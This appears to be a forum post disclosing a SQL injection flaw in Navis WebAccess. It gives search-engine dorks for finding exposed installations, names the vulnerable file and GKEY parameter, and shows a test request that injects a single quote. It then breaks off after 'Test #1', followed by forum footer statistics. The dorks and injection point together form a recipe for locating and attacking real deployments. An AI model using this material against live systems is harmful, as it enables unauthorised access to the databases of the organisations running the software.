Navis WebAccess - SQL Injection

{{ Dorks }} "Copyright © 2016 Navis, A Zebra Technologies Company" "Confidential Information of Navis, A Zebra Technologies Company" inurl:GKEY= ext:do...

{{ Dorks }}

"Copyright © 2016 Navis, A Zebra Technologies Company"
"Confidential Information of Navis, A Zebra Technologies Company"
inurl:GKEY= ext:do
inurl:/express/secure/Today.jsp
navis.com webaccess
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@



Vulnerability: SQL Injection
File: /express/showNotice.do
Vul Parameter: GKEY


================================================================================================
Test #1

http://localhost:9000/express/showNotice.do?report_type=1&GKEY=2'
 
131,788Konular
3,271,342Mesajlar
316,181Kullanıcılar
BHADOWMERCYSon Üye
Üst Alt